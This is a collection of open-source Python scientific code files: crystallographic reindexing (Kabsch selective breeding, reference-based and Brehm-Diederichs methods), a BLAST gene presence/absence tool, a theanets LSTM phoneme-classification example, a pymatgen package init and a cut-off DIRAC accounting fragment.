self.log_out.write(" Operator to Niggli cell: %s\n" % op_to_p1.as_hkl())
self.log_out.write(" Niggli cell: %s\n" % format_unit_cell(avg_symm.unit_cell().change_basis(op_to_p1)))
print >>self.log_out, "\nReading"
cells = []
bad_files, good_files = [], []
for i, f in enumerate(self.xac_files):
print >>self.log_out, "%4d %s" % (i, f)
xac = XDS_ASCII(f, i_only=True)
self.log_out.write(" d_range: %6.2f - %5.2f" % xac.i_obs().resolution_range())
self.log_out.write(" n_ref=%6d" % xac.i_obs().size())
xac.remove_rejected()
a = xac.i_obs().resolution_filter(d_min=self.d_min)
if self.min_ios is not None: a = a.select(a.data()/a.sigmas()>=self.min_ios)
self.log_out.write(" n_ref_filtered=%6d" % a.size())
if from_p1:
a = a.change_basis(op_to_p1).customized_copy(space_group_info=sgtbx.space_group_info("P1"))
a = a.as_non_anomalous_array().merge_equivalents(use_internal_variance=False).array()
self.log_out.write(" n_ref_merged=%6d\n" % a.size())
if a.size() < 2:
self.log_out.write(" !! WARNING !! number of reflections is dangerously small!!\n")
bad_files.append(f)
else:
self.arrays.append(a)
cells.append(a.unit_cell().parameters())
good_files.append(f)
if bad_files:
self.xac_files = good_files
self.bad_files = bad_files
assert len(self.xac_files) == len(self.arrays) == len(cells)
print >>self.log_out, ""
self._representative_xs = crystal.symmetry(list(numpy.median(cells, axis=0)),
space_group_info=self.arrays[0].space_group_info())
# read_xac_files()
def show_assign_summary(self, log_out=None):
if not log_out: log_out = self.log_out
if not self.best_operators:
log_out.write("ERROR: Operators not assigned.\n")
return
unique_ops = set(self.best_operators)
op_count = map(lambda x: (x, self.best_operators.count(x)), unique_ops)
op_count.sort(key=lambda x: x[1])
log_out.write("Assigned operators:\n")
for op, num in reversed(op_count):
log_out.write(" %10s: %4d\n" % (op.as_hkl(), num))
log_out.write("\n")
# show_assign_summary()
def find_reindex_ops(self):
symm = self.representative_crystal_symmetry()
cosets = reindex.reindexing_operators(symm, symm, max_delta=self.max_delta)
reidx_ops = cosets.combined_cb_ops()
return reidx_ops
# find_reindex_ops()
def modify_xds_ascii_files(self, suffix="_reidx", cells_dat_out=None):
#ofs_lst = open("for_merge_new.lst", "w")
if cells_dat_out: cells_dat_out.write("file a b c al be ga\n")
new_files = []
print >>self.log_out, "Writing reindexed files.."
assert len(self.xac_files) == len(self.best_operators)
for i, (f, op) in enumerate(zip(self.xac_files, self.best_operators)):
xac = XDS_ASCII(f, read_data=False)
if op.is_identity_op():
new_files.append(f)
if cells_dat_out:
cell = xac.symm.unit_cell().parameters()
cells_dat_out.write(f+" "+" ".join(map(lambda x:"%7.3f"%x, cell))+"\n")
continue
newf = f.replace(".HKL", suffix+".HKL") if ".HKL" in f else os.path.splitext(f)[0]+suffix+".HKL"
print >>self.log_out, "%4d %s" % (i, newf)
cell_tr = xac.write_reindexed(op, newf, space_group=self.arrays[0].crystal_symmetry().space_group())
#ofs_lst.write(newf+"\n")
new_files.append(newf)
if cells_dat_out:
cells_dat_out.write(newf+" "+" ".join(map(lambda x:"%7.3f"%x, cell_tr.parameters()))+"\n")
return new_files
# modify_xds_ascii_files()
def debug_write_mtz(self):
arrays = self.arrays
merge_org = arrays[0].deep_copy()
for a in arrays[1:]: merge_org = merge_org.concatenate(a, assert_is_similar_symmetry=False)
merge_org = merge_org.merge_equivalents(use_internal_variance=False).array()
merge_org.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="noreindex.mtz")
merge_new = None
for a, op in zip(arrays, self.best_operators):
if not op.is_identity_op(): a = a.customized_copy(indices=op.apply(a.indices()))
if merge_new is None: merge_new = a
else: merge_new = merge_new.concatenate(a, assert_is_similar_symmetry=False)
merge_new = merge_new.merge_equivalents(use_internal_variance=False).array()
merge_new.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="reindexed.mtz")
# debug_write_mtz()
# class ReindexResolver
def kabsch_selective_breeding_worker(args):
ref, i, tmp, new_ops = args
global kabsch_selective_breeding_worker_dict
nproc = kabsch_selective_breeding_worker_dict["nproc"]
arrays = kabsch_selective_breeding_worker_dict["arrays"]
reindexed_arrays = kabsch_selective_breeding_worker_dict["reindexed_arrays"]
reidx_ops = kabsch_selective_breeding_worker_dict["reidx_ops"]
if ref==i: return None
if nproc > 1:
tmp2 = reindexed_arrays[new_ops[ref]][ref]
else:
if reidx_ops[new_ops[ref]].is_identity_op(): tmp2 = arrays[ref]
else: tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
if cc==cc: return cc
return None
# work_local()
class KabschSelectiveBreeding(ReindexResolver):
"""
Reference: W. Kabsch "Processing of X-ray snapshots from crystals in random orientations" Acta Cryst. (2014). D70, 2204-2216
http://dx.doi.org/10.1107/S1399004714013534
If I understand correctly...
"""
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, from_p1=False, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self._final_cc_means = [] # list of [(op_index, cc_mean), ...]
self._reidx_ops = []
self.read_xac_files(from_p1=from_p1)
# __init__()
def final_cc_means(self): return self._final_cc_means
def reindex_operators(self): return self._reidx_ops
def assign_operators(self, reidx_ops=None, max_cycle=100):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:"
for i, op in enumerate(reidx_ops): print >>self.log_out, " %2d: %s" % (i, op.as_hkl())
print >>self.log_out, ""
reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
self._reidx_ops = reidx_ops
if self.nproc > 1:
# consumes much memory.. (but no much benefits)
reindexed_arrays = [arrays]
for op in reidx_ops[1:]:
reindexed_arrays.append(map(lambda x: x.customized_copy(indices=op.apply(x.indices())).map_to_asu(), arrays))
else:
reindexed_arrays = None
old_ops = map(lambda x:0, xrange(len(arrays)))
new_ops = map(lambda x:0, xrange(len(arrays)))
global kabsch_selective_breeding_worker_dict
kabsch_selective_breeding_worker_dict = dict(nproc=self.nproc, arrays=arrays,
reindexed_arrays=reindexed_arrays,
reidx_ops=reidx_ops) # constants during cycles
pool = multiprocessing.Pool(self.nproc)
for ncycle in xrange(max_cycle):
#new_ops = copy.copy(old_ops) # doesn't matter
self._final_cc_means = []
for i in xrange(len(arrays)):
cc_means = []
a = arrays[i]
#ttt=time.time()
for j, op in enumerate(reidx_ops):
cc_list = []
if self.nproc > 1:
tmp = reindexed_arrays[j][i]
else:
if op.is_identity_op(): tmp = a
else: tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
"""
def work_local(ref): # XXX This function is very slow when nproc>1...
if ref==i: return None
if self.nproc > 1:
tmp2 = reindexed_arrays[new_ops[ref]][ref]
else:
if reidx_ops[new_ops[ref]].is_identity_op(): tmp2 = arrays[ref]
else: tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
if cc==cc: return cc
return None
# work_local()
cc_list = easy_mp.pool_map(fixed_func=work_local,
args=range(len(arrays)),
processes=self.nproc)
"""
cc_list = pool.map(kabsch_selective_breeding_worker,
((k, i, tmp, new_ops) for k in range(len(arrays))))
cc_list = filter(lambda x: x is not None, cc_list)
if len(cc_list) > 0:
cc_means.append((j, sum(cc_list)/len(cc_list)))
#print >>self.log_out, "DEBUG:", i, j, cc_list, cc_means[-1]
if cc_means:
max_el = max(cc_means, key=lambda x:x[1])
print >>self.log_out, "%3d %s" % (i, " ".join(map(lambda x: "%s%d:% .4f" % ("*" if x[0]==max_el[0] else " ", x[0], x[1]), cc_means)))
self._final_cc_means.append(cc_means)
#print "%.3f sec" % (time.time()-ttt)
new_ops[i] = max_el[0]
else:
print >>self.log_out, "%3d %s Error! cannot calculate CC" % (i, " ".join(map(lambda x: " %d: nan" % x, xrange(len(reidx_ops)))))
# XXX append something to self._final_cc_means?
print >>self.log_out, "In %4d cycle" % (ncycle+1)
print >>self.log_out, " old",old_ops
print >>self.log_out, " new",new_ops
print >>self.log_out, " number of different assignments:", len(filter(lambda x:x[0]!=x[1], zip(old_ops,new_ops)))
print >>self.log_out, ""
if old_ops==new_ops:
self.best_operators = map(lambda x: reidx_ops[x], new_ops)
print >>self.log_out, "Selective breeding is finished in %d cycles" % (ncycle+1)
return
old_ops = copy.copy(new_ops)
print >>self.log_out, "WARNING:: Selective breeding is not finished. max cycles reached."
self.best_operators = map(lambda x: reidx_ops[x], new_ops) # better than nothing..
# assign_operators()
# class KabschSelectiveBreeding
class ReferenceBased(ReindexResolver):
def __init__(self, xac_files, ref_array, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self.read_xac_files()
self.ref_array = ref_array.resolution_filter(d_min=d_min).as_non_anomalous_array().merge_equivalents(use_internal_variance=False).array()
# __init__()
def assign_operators(self, reidx_ops=None):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
print >>self.log_out, ""
reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
new_ops = map(lambda x:0, xrange(len(arrays)))
for i, a in enumerate(arrays):
cc_list = []
a = arrays[i]
for j, op in enumerate(reidx_ops):
if op.is_identity_op(): tmp = a
else: tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
cc = calc_cc(tmp, self.ref_array)
if cc==cc: cc_list.append((j,cc))
max_el = max(cc_list, key=lambda x:x[1])
print >>self.log_out, "%3d %s" % (i, " ".join(map(lambda x: "%s%d:% .4f" % ("*" if x[0]==max_el[0] else " ", x[0], x[1]), cc_list)))
new_ops[i] = max_el[0]
print >>self.log_out, " operator:", new_ops
print >>self.log_out, " number of different assignments:", len(filter(lambda x:x!=0, new_ops))
print >>self.log_out, ""
self.best_operators = map(lambda x: reidx_ops[x], new_ops)
# assign_operators()
# class ReferenceBased
class BrehmDiederichs(ReindexResolver):
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
ReindexResolver.__init__(self, xac_files, d_min, min_ios, nproc, max_delta, log_out)
self.read_xac_files()
# __init__()
def assign_operators(self, reidx_ops=None):
arrays = self.arrays
self.best_operators = None
if reidx_ops is None: reidx_ops = self.find_reindex_ops()
print >>self.log_out, "Reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
print >>self.log_out, ""
reidx_ops.sort(key=lambda x: not x.is_identity_op()) # identity op to first
data = None
latt_id = flex.int([])
for i, a in enumerate(arrays):
if data is None: data = a
else: data = data.concatenate(a, assert_is_similar_symmetry=False)
latt_id.extend(flex.int(a.size(), i))
latt_id = data.customized_copy(data=latt_id.as_double())
result = brehm_diederichs.run(L=[data, latt_id], nproc=self.nproc, verbose=True)
self.best_operators = map(lambda x: None, xrange(len(arrays)))
for op in result:
idxes = map(int, result[op])
print >>self.log_out, " %s num=%3d idxes= %s" %(op, len(result[op]), idxes)
for idx in idxes:
self.best_operators[idx] = sgtbx.change_of_basis_op(op)
# assign_operators()
# class BrehmDiederichs
if __name__ == "__main__":
import sys
lst = sys.argv[1]
xac_files = map(lambda x:x.strip(), open(lst))
ksb = KabschSelectiveBreeding(xac_files, log_out=sys.stdout)
if 1: # debug code
from cctbx import sgtbx
import random
debug_op = sgtbx.change_of_basis_op("k,h,l")
idxes = range(len(ksb.arrays))
random.shuffle(idxes)
for i in idxes[:len(ksb.arrays)//2]:
ksb.arrays[i] = ksb.arrays[i].customized_copy(indices=debug_op.apply(ksb.arrays[i].indices()))
print "altered:", idxes
ksb.assign_operators([debug_op, sgtbx.change_of_basis_op("h,k,l")])
print "right?:", [i for i, x in enumerate(ksb.best_operators) if not x.is_identity_op()]
#ksb.debug_write_mtz()
#ksb.modify_xds_ascii_files()
quit()
arrays = []
for f in xac_files:
print "Reading", f
xac = XDS_ASCII(f, i_only=True)
xac.remove_rejected()
a = xac.i_obs().resolution_filter(d_min=3)
a = a.merge_equivalents(use_internal_variance=False).array()
arrays.append(a)
symm = arrays[0].crystal_symmetry()
cosets = reindex.reindexing_operators(symm, symm)
reidx_ops = cosets.combined_cb_ops()
reidx_ops.sort(key=lambda x: not x.is_identity_op())
print " Possible reindex operators:", map(lambda x: str(x.as_hkl()), reidx_ops)
determined = set([0,])
old_ops = map(lambda x:0, xrange(len(arrays)))
for ncycle in xrange(100): # max cycle
new_ops = map(lambda x:0, xrange(len(arrays)))
for i in xrange(len(arrays)):
cc_list = []
a = arrays[i]
for j, op in enumerate(reidx_ops):
tmp = a.customized_copy(indices=op.apply(a.indices())).map_to_asu()
for ref in determined:
if ref==i: continue
tmp2 = arrays[ref].customized_copy(indices=reidx_ops[new_ops[ref]].apply(arrays[ref].indices())).map_to_asu()
cc = calc_cc(tmp, tmp2)
#print "%d reindex= %10s cc=.%4f" % (i, op.as_hkl(), cc)
if cc==cc:
#cc_list.setdefault(op, []).append(cc)
cc_list.append((j,cc))
if len(cc_list) == 0: continue
max_el = max(cc_list, key=lambda x:x[1])
print i, max_el, sum(map(lambda x:x[1], cc_list))/len(cc_list)
new_ops[i] = max_el[0]
#arrays[i] = a.customized_copy(indices=reidx_ops[max_el[0]].apply(a.indices())).map_to_asu()
determined.add(i)
print "In %4d cycle" % ncycle
print "old",old_ops
print "new",new_ops
print "eq?", old_ops==new_ops
print
if old_ops==new_ops: break
old_ops = new_ops
# Junk
merge_org = arrays[0].deep_copy()
for a in arrays[1:]: merge_org = merge_org.concatenate(a, assert_is_similar_symmetry=False)
merge_org = merge_org.merge_equivalents(use_internal_variance=False).array()
merge_org.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="noreindex.mtz")
merge_new = None
for a, opi in zip(arrays, new_ops):
a = a.customized_copy(indices=reidx_ops[opi].apply(a.indices()))
if merge_new is None: merge_new = a
else: merge_new = merge_new.concatenate(a, assert_is_similar_symmetry=False)
merge_new = merge_new.merge_equivalents(use_internal_variance=False).array()
merge_new.as_mtz_dataset(column_root_label="I").mtz_object().write(file_name="reindexed.mtz")
|
keitaroyam/yamtbx
|
yamtbx/dataproc/auto/multi_merging/resolve_reindex.py
|
Python
|
bsd-3-clause
| 20,485
|
[
"CRYSTAL"
] |
006da0fa0b5ad0a13b00290570f3114898acb96025dc6cd9598e38a4bbc1e045
|
#!/usr/bin/env python
import os
import sys
from Bio import SeqIO, Entrez
from Bio.Blast import NCBIXML
import threading
import argparse
import subprocess
import time
programUsage = """
NAME
preAb.py - Presence/absence of genes with BLAST.
SYNOPSIS
preAb.py -i genes*.fasta -d db*.fasta -o output -c query_cov -p query_identity
-e E-value
DESCRIPTION
Runs BLAST against the query genes against the given database sequences to identify
whether it's present/absent.
By default the format for the input sequences is FASTA.
#Simplest way to run it is to provide the input sequences in fasta format (default).
pneumoSerotyper.py -i *.fasta -o output
OPTIONS
-h
Help. Print this help information and exit.
-i filenames
Specify the input fasta sequence files for the program. You can use wildcard (*)
to speficy multiple files.
-o filename
Specify the prefix for the output files. By default the output files will have
a prefix "Serotypes.Summary" if not specified by the user (default=Output).
-c value
Specify the minimum query coverage (%) to be used (default=90).
-p value
Specify the minimum identity (%) for all matched regions (default=90)
-e value
Specify the minimum BLAST e-value to be used (default=0.001).
-l value
Specify the minimum length of a match to be used (default=100).
AUTHOR
cc19. June 2015
DEPENDENCIES
biopython,NCBI BLAST
"""
def readUserArguments(UserArgs):
Options = argparse.ArgumentParser(UserArgs[0],
description="preAb.py - Presence/absence of genes with BLAST",
prefix_chars="-",
add_help=False,
epilog="Chrispin Chaguza (Chrispin.Chaguza@liv.ac.uk)")
Options.add_argument("-i",
action="store",
nargs="*",
required=False,
metavar="Input",
dest="Input",
help="Input genomes (fasta format)")
Options.add_argument("-d",
action="store",
nargs="*",
required=False,
metavar="Dbase",
dest="Dbase",
help="Input genomes (fasta format)")
Options.add_argument("-o",
action="store",
nargs=1,
required=False,
metavar="Output",
dest="Output",
help="Output prefix (default=Output)",
default="Output")
Options.add_argument("-c",
action="store",
nargs=1,
required=False,
metavar="Sequence_Coverage",
dest="Sequence_Coverage",
help="Percent query coverage (default=90)",
default="90")
Options.add_argument("-p",
action="store",
nargs=1,
required=False,
metavar="Sequence_Identity",
dest="Sequence_Identity",
help="Percent Identity for BLAST HSPs (default=90)",
default="90")
Options.add_argument("-e",
action="store",
nargs=1,
required=False,
metavar="EValue",
dest="EValue",
help="BLAST E-value (default=0.001)",
default="0.001")
Options.add_argument("-l",
action="store",
nargs=1,
required=False,
metavar="Length",
dest="Length",
help="Minimum HSP match length (default=100)",
default="100")
Options.add_argument("-r",
action="store_true",
dest="Keep",
help="Remove BLAST output files (keep by default)")
Options.add_argument("-h",
action="store_true",
dest="Help",
help="Show detailed help")
Options = Options.parse_args()
return Options
def checkUserArguments(UserOptions):
Options = UserOptions
OptionsVars = {}
if Options.Help:
sys.stdout.write(str(programUsage) + "\n")
sys.exit()
if Options.Input:
OptionsVars["i"] = Options.Input[0:]
else:
showErrorMessage("input files (-i) are required")
sys.exit()
if Options.Dbase:
OptionsVars["d"] = Options.Dbase[0:]
else:
showErrorMessage("input files (-d) are required")
sys.exit()
if Options.Output != "Output":
OptionsVars["o"] = Options.Output[0:][0]
else:
OptionsVars["o"] = Options.Output[0:]
if Options.Sequence_Coverage != "90":
if ((int(Options.Sequence_Coverage[0:][0]) > 0) and (int(Options.Sequence_Coverage[0:][0]) < 100)):
OptionsVars["c"] = Options.Sequence_Coverage[0:][0]
else:
showErrorMessage("Sequence coverage (-c) should be >0 and <=100 (default=90)")
else:
OptionsVars["c"] = Options.Sequence_Coverage[0:]
if Options.Sequence_Identity != "90":
if ((float(Options.Sequence_Identity[0:][0]) > 0) and (float(Options.Sequence_Identity[0:][0]) <= 100)):
OptionsVars["p"] = Options.Sequence_Identity[0:][0]
else:
showErrorMessage("Sequence identity (-p) should be >0 and <=100 (default=90)")
else:
OptionsVars["p"] = Options.Sequence_Identity[0:]
if Options.EValue != "0.001":
if float(Options.EValue[0:][0]) >= 0:
OptionsVars["e"] = Options.EValue[0:][0]
else:
showErrorMessage("BLAST E-value (-e) should be >0 (default=0.001)")
else:
OptionsVars["e"] = Options.EValue[0:]
if Options.Length != "100":
if float(Options.Length[0:][0]) >= 0:
OptionsVars["l"] = Options.Length[0:][0]
else:
showErrorMessage("Minimum HSP match length (-l) should be >0 (default=100)")
else:
OptionsVars["l"] = Options.Length[0:]
OptionsVars["r"] = Options.Keep
return OptionsVars
def showErrorMessage(ErrorMessage):
sys.stdout.write("\nError: " + str(ErrorMessage) + "\n")
sys.stdout.write("\nUse -h option to see more detailed help\n")
sys.exit()
def showProgramStatus(ItemList, ItemPos):
NumElements = ItemList
ProgressChars = "="
HashChars = ProgressChars * int(round(float(ItemPos + 1) / float(NumElements) * 100))
SpaceChars = " " * int(round(100 - len(HashChars)))
PercentChars = float(ItemPos + 1) / NumElements * 100
if (ItemPos + 1) >= ItemList or PercentChars >= 100 or \
(int(float(ItemPos + 1) / float(NumElements) * 100) >= 100):
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(ProgressChars * 100, 100, ""))
sys.stdout.flush()
sys.stdout.write("\r|{0}| {1:.2f}% ".format(ProgressChars * 100, 100))
else:
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(HashChars + SpaceChars, PercentChars, ""))
sys.stdout.flush()
sys.stdout.write("\r|{0}| {1:.2f}% {2}".format(HashChars + SpaceChars, PercentChars, ""))
def RunBLASTThread(blastCommand, blastOutput):
try:
FNULL = open(blastOutput, "wb")
subprocess.check_call(blastCommand, stdout=FNULL, stderr=FNULL)
FNULL.close()
except (StandardError, KeyboardInterrupt, SystemExit), ErrorText:
sys.stdout.write("\n" + ErrorText.message + "\n\n")
sys.exit()
def main():
Args = readUserArguments(sys.argv[:])
inputOptions = checkUserArguments(Args)
print "\n---------------------------------------------------------------------------------------------------------------"
print "- preAb v1.0.0 -"
print "---------------------------------------------------------------------------------------------------------------"
print "- Program for identifying presence/absence of genes sequences using BLAST -"
print "- Institute of Infection and Global Health, University of Liverpool, UK -"
print "- All rights reserved -"
print "---------------------------------------------------------------------------------------------------------------"
if not os.path.exists(inputOptions["o"] + ".Tmp.Files/"):
os.makedirs(inputOptions["o"] + ".Tmp.Files/")
else:
pass
print "\ncreating sequence database for the input fasta sequences"
for geneSeqPos, geneSeq in enumerate(inputOptions["d"]):
makeDBaseCommand = []
makeDBaseCommand.append("makeblastdb")
makeDBaseCommand.append("-in")
makeDBaseCommand.append(geneSeq)
makeDBaseCommand.append("-dbtype")
makeDBaseCommand.append("nucl")
FNULL = open(os.devnull, "wb")
subprocess.call(makeDBaseCommand, stdout=FNULL, stderr=FNULL)
FNULL.close()
showProgramStatus(len(inputOptions["d"]), geneSeqPos)
print "\n\nrunning BLAST on the query sequences against database"
blastOutputFiles = []
inputGeneNames = []
inputDBNames = []
currentThreads = threading.activeCount()
for isolateSeqPos, isolateSeq in enumerate(inputOptions["d"]):
inSeqFName = os.path.basename(isolateSeq).split(".")[0]
inputDBNames.append(inSeqFName)
for geneSeqPos, geneSeq in enumerate(inputOptions["i"]):
geneFName = os.path.basename(geneSeq).split(".")[0]
blastCommand = []
blastCommand.append("blastn")
blastCommand.append("-query")
blastCommand.append(geneSeq)
blastCommand.append("-db")
blastCommand.append(isolateSeq)
blastCommand.append("-outfmt")
blastCommand.append("5")
blastCommand.append("-out")
blastCommand.append(inputOptions["o"] + ".Tmp.Files/" + inSeqFName + "." + geneFName + ".blast.xml")
blastOutputFiles.append(inputOptions["o"] + ".Tmp.Files/" + inSeqFName + "." + geneFName + ".blast.xml")
inputGeneNames.append(geneFName)
while True:
if threading.activeCount() < 15:
try:
blastThread = threading.Thread(name=inSeqFName + "." + geneFName,
target=RunBLASTThread, args=(blastCommand, os.devnull))
blastThread.setDaemon(True)
blastThread.start()
except (StandardError, KeyboardInterrupt, SystemExit):
print "Unknown error occurred OR the user killed the program"
sys.exit()
showProgramStatus(len(inputOptions["i"])*len(inputOptions["d"]), isolateSeqPos*len(inputOptions["i"])+geneSeqPos)
break
showProgramStatus(len(inputOptions["i"])*len(inputOptions["d"]), (isolateSeqPos+1)*len(inputOptions["i"]))
while threading.activeCount() > currentThreads:
time.sleep(2)
print "\n\ncalculating length of each query sequence"
blastOutputTXT = open(inputOptions["o"]+".Summary.txt","w")
geneSeqLengths = {}
for geneSequencePos,geneSequence in enumerate(inputOptions["i"]):
geneSequenceRecord=SeqIO.read(open(geneSequence,"rU"),"fasta")
geneSeqLengths[os.path.basename(geneSequence).split(".")[0]]=len(geneSequenceRecord.seq)
showProgramStatus(len(inputOptions["i"]), geneSequencePos)
blastOutputTXT.write("taxa")
for querySeqPos, querySeq in enumerate(inputOptions["i"]):
blastOutputTXT.write("\t"+os.path.basename(querySeq).split(".")[0])
blastOutputTXT.write("\n")
print "\n\ndetermining query sequence coverage and percent identity"
for subjectSeqPos, subjectSeq in enumerate(inputDBNames):
blastOutputTXT.write(subjectSeq)
sbjctSeqName=os.path.basename(subjectSeq).split(".")[0]
for querySeqPos, querySeq in enumerate(inputOptions["i"]):
querySeqName=os.path.basename(querySeq).split(".")[0]
try:
blastOutput=open(inputOptions["o"] + ".Tmp.Files/"+sbjctSeqName+"."+querySeqName+".blast.xml","rU")
blastRecord=NCBIXML.read(blastOutput)
tempCoverage = []
tempIdentity = []
tempIdentityCount = 0
for blastRecordAlign in blastRecord.alignments:
for hsp in blastRecordAlign.hsps:
if (hsp.expect < float(inputOptions["e"])) and (len(hsp.query) >= int(inputOptions["l"])):
tempCoverage.append(len(hsp.query))
tempIdentity.append(hsp.match.count("|")/float(len(hsp.query)))
tempIdentityCount+=1
querySeqCoverage = (sum(tempCoverage)/float(geneSeqLengths[querySeqName]))*100
if tempIdentityCount == 0:
matchIdentity = 0
else:
matchIdentity = (sum(tempIdentity)/float(tempIdentityCount))*100
if querySeqCoverage >= 100:
querySeqCoverage = 100
else:
querySeqCoverage=querySeqCoverage
if (querySeqCoverage>=float(inputOptions["c"])) and (matchIdentity>=float(inputOptions["p"])):
blastOutputTXT.write("\t1")
else:
blastOutputTXT.write("\t0")
except (KeyboardInterrupt, SystemExit),err:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
print "Something wrong with BLAST files OR the user killed the program"
sys.exit()
showProgramStatus(len(inputDBNames)*len(inputOptions["i"]),subjectSeqPos*len(inputOptions["i"])+querySeqPos)
showProgramStatus(len(inputDBNames)*len(inputOptions["i"]),(subjectSeqPos+1)*len(inputOptions["i"]))
#sortedSerotypeCoverage = sorted(serotypeCoverage.iteritems(),key=operator.itemgetter(1),reverse=True)
blastOutputTXT.write("\n")
blastOutputTXT.close()
print "\n--------------------------------------------------------------------------------------------------------------"
print "- Finished -"
print "--------------------------------------------------------------------------------------------------------------\n"
if __name__ == "__main__":
main()
|
cc19/featurePresenceAbsence
|
preAb.py
|
Python
|
gpl-2.0
| 15,051
|
[
"BLAST",
"Biopython"
] |
2750226e4415c6d8e2b8e57fc21647e442c28357c2a305b11309e8664d58e1a1
|
#!/usr/bin/env python
'''Theanets example using a deep bidirectional LSTM for phoneme classification.
This example loads an audio classification benchmark from github, defines a
callable for extracting batches from the downloaded dataset, and trains a deep
classifier network on the data. The network that is evaluated as part of the
benchmarks is a three-layer bidirectional LSTM. Typically the model exceeds 90%
accuracy on the training set, but reaches only about 70% accuracy on the
validation set. Clearly overtraining is a critical issue here.
This example only works with Python 2 at the moment.
'''
import climate
import io
import numpy as np
import theanets
import scipy.io
import os
import tempfile
import urllib
import zipfile
logging = climate.get_logger('lstm-chime')
climate.enable_default_logging()
BATCH_SIZE = 32
TRAIN_NC = os.path.join(tempfile.gettempdir(), 'chime1_train.nc')
VALID_NC = os.path.join(tempfile.gettempdir(), 'chime1_valid.nc')
ZIPURL = 'https://github.com/craffel/lstm_benchmarks/archive/master.zip'
# If needed, get the data files from https://github.com/craffel/lstm_benchmarks.
if not os.path.isfile(TRAIN_NC) or not os.path.isfile(VALID_NC):
logging.info('attempting data copy from url: %s', ZIPURL)
z = zipfile.ZipFile(io.BytesIO(urllib.urlopen(ZIPURL).read()))
with open(TRAIN_NC, 'wb') as savefile:
savefile.write(z.read('lstm_benchmarks-master/data/train_1_speaker.nc'))
with open(VALID_NC, 'wb') as savefile:
savefile.write(z.read('lstm_benchmarks-master/data/val_1_speaker.nc'))
z.close()
def batch_at(features, labels, seq_begins, seq_lengths):
'''Extract a single batch of data to pass to the model being trained.
Parameters
----------
features, labels : ndarray
Arrays of the input features and target labels.
seq_begins : ndarray
Array of the start offsets of the speech segments to include.
seq_lengths : ndarray
Array of the lengths of the speech segments to include in the batch.
Returns
-------
features, labels, mask : ndarrays
A triple of arrays for training a network. The first element contains
input features, the second contains target labels, and the third
contains a "mask" consisting of ones where there is valid data and zeros
everywhere else.
'''
length = seq_lengths.max()
feat = np.zeros((length, BATCH_SIZE, features.shape[-1]), 'f')
labl = np.zeros((length, BATCH_SIZE), 'int32')
mask = np.zeros((length, BATCH_SIZE), 'f')
for b, (begin, length) in enumerate(zip(seq_begins, seq_lengths)):
feat[:length, b] = features[begin:begin+length]
labl[:length, b] = labels[begin:begin+length]
mask[:length, b] = 1
return [feat, labl, mask]
def batches(dataset):
'''Returns a callable that chooses sequences from netcdf data.'''
seq_lengths = dataset.variables['seqLengths'].data
seq_begins = np.concatenate(([0], np.cumsum(seq_lengths)[:-1]))
def sample():
chosen = np.random.choice(
list(range(len(seq_lengths))), BATCH_SIZE, replace=False)
return batch_at(dataset.variables['inputs'].data,
dataset.variables['targetClasses'].data,
seq_begins[chosen],
seq_lengths[chosen])
return sample
# Now that we can load data, we construct a recurrent classifier model and then
# train it up! Training progress will be displayed on the console. This example
# can take a good while to run, especially the first time it is run (it takes
# about 20min to compile the model from scratch, but only a few minutes if all
# of the compiler targets are cached).
def layer(n):
'''Helper for building a bidirectional LSTM layer with n cells.'''
return dict(form='bidirectional', worker='lstm', size=n)
e = theanets.Experiment(
theanets.recurrent.Classifier,
layers=(39, layer(156), layer(300), layer(102), (51, 'softmax')),
weighted=True,
)
e.train(
batches(scipy.io.netcdf_file(TRAIN_NC)),
batches(scipy.io.netcdf_file(VALID_NC)),
algorithm='rmsprop',
learning_rate=0.0001,
momentum=0.9,
max_gradient_clip=1,
input_noise=0.6,
train_batches=30,
valid_batches=3,
batch_size=BATCH_SIZE,
)
|
masterkeywikz/seq2graph
|
src/theanets-0.6.1/examples/lstm-chime.py
|
Python
|
mit
| 4,307
|
[
"NetCDF"
] |
8eb923581e8e6f81610cc43f99100271318fc76f080cb1cab9337d0e79ffda09
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package implements various diffraction analyses.
"""
|
vorwerkc/pymatgen
|
pymatgen/analysis/diffraction/__init__.py
|
Python
|
mit
| 156
|
[
"pymatgen"
] |
65f7ea6dc1ced7a4a3530d417bbede54ccfb9de89b0d0ce48ab37b0fc6acab6e
|
""" Accounting reporter
"""
import hashlib
import re
from DIRAC import S_OK, S_ERROR, gConfig
from DIRAC.Core.Utilities.Plotting.ObjectLoader import loadObjects
from DIRAC.ConfigurationSystem.Client.PathFinder import getServiceSection
from DIRAC.AccountingSystem.private.Policies import gPoliciesList
from DIRAC.AccountingSystem.private.Plotters.BaseReporter import BaseReporter as myBaseReporter
class PlottersList(object):
def __init__(self):
objectsLoaded = loadObjects('AccountingSystem/private/Plotters',
re.compile(r".*[a-z1-9]Plotter\.py$"),
